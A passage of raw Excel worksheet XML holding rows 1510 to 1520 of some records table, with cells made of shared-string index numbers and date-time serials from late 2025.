      <c r="B1510" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1510" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1510" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1510" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1510" s="23" t="s">
        <v>10938</v>
      </c>
      <c r="G1510" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1510" s="23"/>
      <c r="I1510" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1510" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1510" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1510" s="24">
        <v>45982.3585069444</v>
      </c>
      <c r="M1510" s="24">
        <v>45982.3585069444</v>
      </c>
      <c r="N1510" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1510" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1510" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1510" s="23"/>
      <c r="R1510" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1510" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1510" s="23"/>
      <c r="U1510" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1510" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1510" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1510" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1510" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1510" s="24">
        <v>45982.3593865741</v>
      </c>
      <c r="AA1510" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1510" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1510" s="23"/>
      <c r="AD1510" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1510" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1510" s="23"/>
      <c r="AG1510" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1510" s="24">
        <v>45982.3594212963</v>
      </c>
      <c r="AI1510" s="23"/>
      <c r="AJ1510" s="23"/>
      <c r="AK1510" s="23"/>
      <c r="AL1510" s="23"/>
      <c r="AM1510" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1510" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1510" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1510" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1510" s="24">
        <v>45982.3802199074</v>
      </c>
      <c r="AR1510" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1510" s="23"/>
      <c r="AT1510" s="23"/>
      <c r="AU1510" s="23"/>
    </row>
    <row r="1511" s="1" customFormat="1" spans="1:47">
      <c r="A1511" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1511" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1511" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1511" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1511" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1511" s="23" t="s">
        <v>10939</v>
      </c>
      <c r="G1511" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1511" s="23"/>
      <c r="I1511" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1511" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1511" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1511" s="24">
        <v>45981.6650810185</v>
      </c>
      <c r="M1511" s="24">
        <v>45981.6898958333</v>
      </c>
      <c r="N1511" s="23" t="s">
        <v>8703</v>
      </c>
      <c r="O1511" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1511" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1511" s="23"/>
      <c r="R1511" s="23" t="s">
        <v>10772</v>
      </c>
      <c r="S1511" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1511" s="23"/>
      <c r="U1511" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1511" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1511" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1511" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1511" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1511" s="24">
        <v>45981.6660300926</v>
      </c>
      <c r="AA1511" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1511" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1511" s="23"/>
      <c r="AD1511" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1511" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1511" s="23"/>
      <c r="AG1511" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1511" s="24">
        <v>45981.6660648148</v>
      </c>
      <c r="AI1511" s="23"/>
      <c r="AJ1511" s="23"/>
      <c r="AK1511" s="23"/>
      <c r="AL1511" s="23"/>
      <c r="AM1511" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1511" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1511" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1511" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1511" s="24">
        <v>45981.6868634259</v>
      </c>
      <c r="AR1511" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1511" s="23"/>
      <c r="AT1511" s="23"/>
      <c r="AU1511" s="23"/>
    </row>
    <row r="1512" s="1" customFormat="1" spans="1:47">
      <c r="A1512" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1512" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1512" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1512" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1512" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1512" s="23" t="s">
        <v>10940</v>
      </c>
      <c r="G1512" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1512" s="23"/>
      <c r="I1512" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1512" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1512" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1512" s="24">
        <v>45981.680462963</v>
      </c>
      <c r="M1512" s="24">
        <v>45981.680462963</v>
      </c>
      <c r="N1512" s="23" t="s">
        <v>8703</v>
      </c>
      <c r="O1512" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1512" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1512" s="23"/>
      <c r="R1512" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1512" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1512" s="23"/>
      <c r="U1512" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1512" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1512" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1512" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1512" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1512" s="24">
        <v>45981.6813773148</v>
      </c>
      <c r="AA1512" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1512" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1512" s="23"/>
      <c r="AD1512" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1512" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1512" s="23"/>
      <c r="AG1512" s="25" t="s">
        <v>8439</v>
      </c>
      <c r="AH1512" s="24">
        <v>45981.6814351852</v>
      </c>
      <c r="AI1512" s="23"/>
      <c r="AJ1512" s="23"/>
      <c r="AK1512" s="23"/>
      <c r="AL1512" s="23"/>
      <c r="AM1512" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1512" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1512" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1512" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1512" s="24">
        <v>45981.7022106481</v>
      </c>
      <c r="AR1512" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1512" s="23"/>
      <c r="AT1512" s="23"/>
      <c r="AU1512" s="23"/>
    </row>
    <row r="1513" s="1" customFormat="1" spans="1:47">
      <c r="A1513" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1513" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1513" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1513" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1513" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1513" s="23" t="s">
        <v>10941</v>
      </c>
      <c r="G1513" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1513" s="23"/>
      <c r="I1513" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1513" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1513" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1513" s="24">
        <v>45981.3639351852</v>
      </c>
      <c r="M1513" s="24">
        <v>45981.6758680556</v>
      </c>
      <c r="N1513" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1513" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1513" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1513" s="23"/>
      <c r="R1513" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1513" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1513" s="23"/>
      <c r="U1513" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1513" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1513" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1513" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1513" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1513" s="24">
        <v>45981.3647337963</v>
      </c>
      <c r="AA1513" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1513" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1513" s="23"/>
      <c r="AD1513" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1513" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1513" s="23"/>
      <c r="AG1513" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1513" s="24">
        <v>45981.3647569444</v>
      </c>
      <c r="AI1513" s="23"/>
      <c r="AJ1513" s="23"/>
      <c r="AK1513" s="23"/>
      <c r="AL1513" s="23"/>
      <c r="AM1513" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1513" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1513" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1513" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1513" s="24">
        <v>45981.3855671296</v>
      </c>
      <c r="AR1513" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1513" s="23"/>
      <c r="AT1513" s="23"/>
      <c r="AU1513" s="23"/>
    </row>
    <row r="1514" s="1" customFormat="1" spans="1:47">
      <c r="A1514" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1514" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1514" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1514" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1514" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1514" s="23" t="s">
        <v>10942</v>
      </c>
      <c r="G1514" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1514" s="23"/>
      <c r="I1514" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1514" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1514" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1514" s="24">
        <v>45981.6519097222</v>
      </c>
      <c r="M1514" s="24">
        <v>45981.6519097222</v>
      </c>
      <c r="N1514" s="23" t="s">
        <v>8712</v>
      </c>
      <c r="O1514" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1514" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1514" s="23"/>
      <c r="R1514" s="23" t="s">
        <v>10943</v>
      </c>
      <c r="S1514" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1514" s="23"/>
      <c r="U1514" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1514" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1514" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1514" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1514" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1514" s="24">
        <v>45981.6522222222</v>
      </c>
      <c r="AA1514" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1514" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1514" s="23"/>
      <c r="AD1514" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1514" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1514" s="23"/>
      <c r="AG1514" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1514" s="24">
        <v>45981.6522569444</v>
      </c>
      <c r="AI1514" s="23"/>
      <c r="AJ1514" s="23"/>
      <c r="AK1514" s="23"/>
      <c r="AL1514" s="23"/>
      <c r="AM1514" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1514" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1514" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1514" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1514" s="24">
        <v>45981.6730555556</v>
      </c>
      <c r="AR1514" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1514" s="23"/>
      <c r="AT1514" s="23"/>
      <c r="AU1514" s="23"/>
    </row>
    <row r="1515" s="1" customFormat="1" spans="1:47">
      <c r="A1515" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1515" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1515" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1515" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1515" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1515" s="23" t="s">
        <v>10944</v>
      </c>
      <c r="G1515" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1515" s="23"/>
      <c r="I1515" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1515" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1515" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1515" s="24">
        <v>45981.628912037</v>
      </c>
      <c r="M1515" s="24">
        <v>45981.628912037</v>
      </c>
      <c r="N1515" s="23" t="s">
        <v>9337</v>
      </c>
      <c r="O1515" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1515" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1515" s="23"/>
      <c r="R1515" s="23" t="s">
        <v>8641</v>
      </c>
      <c r="S1515" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1515" s="23"/>
      <c r="U1515" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1515" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1515" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1515" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1515" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1515" s="24">
        <v>45981.6296875</v>
      </c>
      <c r="AA1515" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1515" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1515" s="23"/>
      <c r="AD1515" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1515" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1515" s="23"/>
      <c r="AG1515" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1515" s="24">
        <v>45981.6297453704</v>
      </c>
      <c r="AI1515" s="23"/>
      <c r="AJ1515" s="23"/>
      <c r="AK1515" s="23"/>
      <c r="AL1515" s="23"/>
      <c r="AM1515" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1515" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1515" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1515" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1515" s="24">
        <v>45981.6505208333</v>
      </c>
      <c r="AR1515" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1515" s="23"/>
      <c r="AT1515" s="23"/>
      <c r="AU1515" s="23"/>
    </row>
    <row r="1516" s="1" customFormat="1" spans="1:47">
      <c r="A1516" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1516" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1516" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1516" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1516" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1516" s="23" t="s">
        <v>10945</v>
      </c>
      <c r="G1516" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1516" s="23"/>
      <c r="I1516" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1516" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1516" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1516" s="24">
        <v>45981.3701157407</v>
      </c>
      <c r="M1516" s="24">
        <v>45981.6068518519</v>
      </c>
      <c r="N1516" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1516" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1516" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1516" s="23"/>
      <c r="R1516" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1516" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1516" s="23"/>
      <c r="U1516" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1516" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1516" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1516" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1516" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1516" s="24">
        <v>45981.3708449074</v>
      </c>
      <c r="AA1516" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1516" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1516" s="23"/>
      <c r="AD1516" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1516" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1516" s="23"/>
      <c r="AG1516" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1516" s="24">
        <v>45981.3708564815</v>
      </c>
      <c r="AI1516" s="23"/>
      <c r="AJ1516" s="23"/>
      <c r="AK1516" s="23"/>
      <c r="AL1516" s="23"/>
      <c r="AM1516" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1516" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1516" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1516" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1516" s="24">
        <v>45981.3916782407</v>
      </c>
      <c r="AR1516" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1516" s="23"/>
      <c r="AT1516" s="23"/>
      <c r="AU1516" s="23"/>
    </row>
    <row r="1517" s="1" customFormat="1" spans="1:47">
      <c r="A1517" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1517" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1517" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1517" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1517" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1517" s="23" t="s">
        <v>10946</v>
      </c>
      <c r="G1517" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1517" s="23"/>
      <c r="I1517" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1517" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1517" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1517" s="24">
        <v>45980.6838888889</v>
      </c>
      <c r="M1517" s="24">
        <v>45981.5972569444</v>
      </c>
      <c r="N1517" s="23" t="s">
        <v>8712</v>
      </c>
      <c r="O1517" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1517" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1517" s="23"/>
      <c r="R1517" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1517" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1517" s="23"/>
      <c r="U1517" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1517" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1517" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1517" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1517" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1517" s="24">
        <v>45980.6847569444</v>
      </c>
      <c r="AA1517" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1517" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1517" s="23"/>
      <c r="AD1517" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1517" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1517" s="23"/>
      <c r="AG1517" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1517" s="24">
        <v>45980.6847800926</v>
      </c>
      <c r="AI1517" s="23"/>
      <c r="AJ1517" s="23"/>
      <c r="AK1517" s="23"/>
      <c r="AL1517" s="23"/>
      <c r="AM1517" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1517" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1517" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1517" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1517" s="24">
        <v>45980.7055902778</v>
      </c>
      <c r="AR1517" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1517" s="23"/>
      <c r="AT1517" s="23"/>
      <c r="AU1517" s="23"/>
    </row>
    <row r="1518" s="1" customFormat="1" spans="1:47">
      <c r="A1518" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1518" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1518" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1518" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1518" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1518" s="23" t="s">
        <v>10947</v>
      </c>
      <c r="G1518" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1518" s="23"/>
      <c r="I1518" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1518" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1518" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1518" s="24">
        <v>45981.3970833333</v>
      </c>
      <c r="M1518" s="24">
        <v>45981.3970833333</v>
      </c>
      <c r="N1518" s="23" t="s">
        <v>8586</v>
      </c>
      <c r="O1518" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1518" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1518" s="23"/>
      <c r="R1518" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1518" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1518" s="23"/>
      <c r="U1518" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1518" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1518" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1518" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1518" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1518" s="24">
        <v>45981.397962963</v>
      </c>
      <c r="AA1518" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1518" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1518" s="23"/>
      <c r="AD1518" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1518" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1518" s="23"/>
      <c r="AG1518" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1518" s="24">
        <v>45981.3979976852</v>
      </c>
      <c r="AI1518" s="23"/>
      <c r="AJ1518" s="23"/>
      <c r="AK1518" s="23"/>
      <c r="AL1518" s="23"/>
      <c r="AM1518" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1518" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1518" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1518" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1518" s="24">
        <v>45981.4187962963</v>
      </c>
      <c r="AR1518" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1518" s="23"/>
      <c r="AT1518" s="23"/>
      <c r="AU1518" s="23"/>
    </row>
    <row r="1519" s="1" customFormat="1" spans="1:47">
      <c r="A1519" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1519" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1519" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1519" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1519" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1519" s="23" t="s">
        <v>10948</v>
      </c>
      <c r="G1519" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1519" s="23"/>
      <c r="I1519" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1519" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1519" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1519" s="24">
        <v>45981.3856597222</v>
      </c>
      <c r="M1519" s="24">
        <v>45981.3856597222</v>
      </c>
      <c r="N1519" s="23" t="s">
        <v>9337</v>
      </c>
      <c r="O1519" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1519" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1519" s="23"/>
      <c r="R1519" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1519" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1519" s="23"/>
      <c r="U1519" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1519" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1519" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1519" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1519" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1519" s="24">
        <v>45981.3865740741</v>
      </c>
      <c r="AA1519" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1519" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1519" s="23"/>
      <c r="AD1519" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1519" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1519" s="23"/>
      <c r="AG1519" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1519" s="24">
        <v>45981.3866203704</v>
      </c>
      <c r="AI1519" s="23"/>
      <c r="AJ1519" s="23"/>
      <c r="AK1519" s="23"/>
      <c r="AL1519" s="23"/>
      <c r="AM1519" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1519" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1519" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1519" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1519" s="24">
        <v>45981.4074074074</v>
      </c>
      <c r="AR1519" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1519" s="23"/>
      <c r="AT1519" s="23"/>
      <c r="AU1519" s="23"/>
    </row>
    <row r="1520" s="1" customFormat="1" spans="1:47">
      <c r="A1520" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1520" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1520" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1520" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1520" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1520" s="23" t="s">
        <v>10949</v>
      </c>
      <c r="G1520" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1520" s="23"/>
      <c r="I1520" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1520" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1520" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1520" s="24">
        <v>45981.3650115741</v>
      </c>
      <c r="M1520" s="24">
        <v>45981.3650115741</v>
      </c>
      <c r="N1520" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1520" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1520" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1520" s="23"/>
      <c r="R1520" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1520" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1520" s="23"/>
      <c r="U1520" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1520" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1520" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1520" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1520" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1520" s="24">
        <v>45981.3654861111</v>
      </c>
      <c r="AA1520" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1520" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1520" s="23"/>
      <c r="AD1520" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1520" s="23" t="s">
